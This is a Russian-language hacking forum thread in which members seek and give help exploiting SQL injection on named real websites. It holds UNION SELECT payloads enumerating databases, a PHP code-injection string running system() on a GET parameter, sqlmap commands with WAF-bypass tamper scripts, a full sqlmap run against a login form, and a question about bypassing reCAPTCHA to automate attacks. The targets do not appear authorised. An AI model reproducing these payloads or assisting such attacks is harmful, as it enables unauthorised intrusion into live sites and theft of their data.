Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    ?search=${system($_GET[c])}&c=ls -la
     
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Вопрос кто сделал что теперь когда переходишь по ссылки там написано "страдать сука" на английском
     
  4. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Ребят помогите раскрутить
    Code:
    http://trafficswirl.com/teamsplash.php?tid=1%27
    Ни как мне эта скуля не дается((
    с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
    либо я дурак либо лыжи правда не едут....
    уязвимость раскручивается точно знаю, только как?(
     
  5. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    WAF блочит если я не ошибаюсь. Крути руками
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ошибаешься waf не причём
    + логично если хав обошёл мамп тем более сможет обойти
     
  7. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://trafficswirl.com/teamsplash.php?tid=1'+union+select+version(),2+--+
     
  8. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
     
  9. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://trafficswirl.com/teamsplash.php?tid=-1'+union+select+schema_name,2+/*!From*/+information_schema.schemata+--+sp
    В ссылках вывод
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Сувал но по логам нет не чего на счёт ваф у меня норм проходит
    ваф меня пропускает
     
  11. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    ну-ка заскринь
     
  12. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    все ребят, отбой раскрутил, ахаха, но всеравно спасибо)
     
  13. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Можно попробовать обойти ваф набором тамперов.

    https://github.com/sqlmapproject/sqlmap/tree/master/waf
     
  14. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Часто стал натыкаться на сайтах на "Защиту от роботов" в основном рекапча
    её как то можно обойти?
    Даже если через сторонний сервис чекать, то как автоматизировать с тем же к примеру sqlmap
     
  15. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Кручу уязвимость:
    Code:
    http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new
    раскручиваю через --dbms=MySQL --risk=3
    но чет какая то лажа выходит(
    [​IMG]
    реально ли такое раскрутить?
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    PHP:
    http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new
    допустим реально. Там W.A.F. Крутите.
     
  17. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    у меня два вопроса, я начинающий)
    Что значит waf?
    крутить так же --dbms=MySQL ?
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    веб апликатион фаерволл
    Да, да крутите, используя тамперы, просто так его sqlmap не раскрутит, ищите для этого другой сайт. У вас 2 варианта: 1)задрочить тампер скрипты. 2) крутить руками. Гуглить sql wafbypass. итд
     
    r1l likes this.
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Не как не могу раскрутить SQL njection через POST запрос в авторизацию
    [​IMG]
    [​IMG]

    Code:
    POST /dokument/full-manual/developers/admin/js/?errauth=blocked_30_min HTTP/1.1
    Content-Length:
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.site.ru:80/
    Cookie: SESSdc0003b8d793c3d72e49c242aa69e1d4=i8hjlikb619hfca2bb9e62qr56; _ym_uid=1472824047791009073; _ym_isad=2; _ym_visorc_2170150=w
    Host: www.site.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms

    Code:
     sqlmap -u www.site.ru/dokument/full-manual/developers/admin/js/?errauth=blocked_30_min --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --dbs --level=2 --risk=2 --string --tamper=space2comment  
            _                                                                                                                                               
    ___ ___| |_____ ___ ___  {1.0.9.1#dev}                                                                                                                  
    _ -| . | |     | .'| . |                                                                                                                                
    ___|_  |_|_|_|_|__,|  _|                                                                                                                                
         |_|           |_|   http://sqlmap.org                                                                                                              
                                                                                                                                                            
    !] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applic
    le local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program                
                                                                                                                                                            
    *] starting at 17:04:23                                                                                                                                 
                                                                                                                                                            
    17:04:23] [INFO] testing connection to the target URL                                                                                                   
    qlmap got a 302 redirect to 'http://www.site.ru:80/BASE_PATH_HREF?errauth=blocked_30_min'. Do you want to follow? [Y/n] Y                             
    edirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y                                              
    17:04:42] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests                           
    17:04:42] [INFO] testing if the provided string is within the target URL page content                                                                   
    17:04:42] [WARNING] you provided '--tamper=space2comment' as the string to match, but such a string is not within the target URL raw response, sqlmap will
    arry on anyway                                                                                                                                          
    17:04:43] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable                                                     
    17:04:44] [INFO] testing for SQL injection on POST parameter 'name'                                                                                     
    17:04:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                             
    17:05:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'                                                           
    17:05:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'                                                 
    17:05:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'                                                                         
    17:05:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'                                                        
    17:05:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'                                                                          
    17:05:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'                                                                               
    17:05:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'                                                                 
    17:05:41] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'                                                                   
    17:05:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                            
    17:05:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                     
    17:05:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                            
    17:06:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'                                                                          
    17:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'                                                         
    17:06:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'                                                
    17:06:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'                                                    
    17:06:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'                                                                    
    17:06:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'                                                
    17:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'                                                                  
    17:07:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'                                                                         
    17:07:09] [INFO] testing 'PostgreSQL error-based - Parameter replace'                                                                                   
    17:07:09] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'                                                                 
    17:07:10] [INFO] testing 'MySQL inline queries'                                                                                                         
    17:07:11] [INFO] testing 'PostgreSQL inline queries'                                                                                                    
    17:07:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'                                                                                   
    17:07:12] [INFO] testing 'Oracle inline queries'                                                                                                        
    17:07:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'                                                                                     
    17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'                                                                                               
    17:07:27] [INFO] POST parameter 'name' appears to be 'MySQL > 5.0.11 stacked queries' injectable                                                        
    t looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n                                         
    or the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] n                          
    17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'                                                                                         
    17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                           
    17:08:51] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'                                                                           
    17:08:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'                                                                                       
    17:08:52] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'                                                                         
    17:08:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                                                 
    17:08:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found    
    17:09:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'                                                                                
    17:09:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'                                                                                   
    17:09:33] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'                                                                                  
    17:09:46] [INFO] checking if the injection point on POST parameter 'name' is a false positive                                                           
    17:09:47] [WARNING] false positive or unexploitable injection point detected                                                                            
    17:09:47] [WARNING] POST parameter 'name' is not injectable                                                                                             
    17:09:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try
    o rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect t
    t there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')        
                                                                                                                                                            
    *] shutting down at 17:09:47                                                                                                                               

    Помогите пожалуйста очень надо
     
  20. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    WAF
     
    #1340 pw0ned, 3 Sep 2016
    Last edited: 3 Sep 2016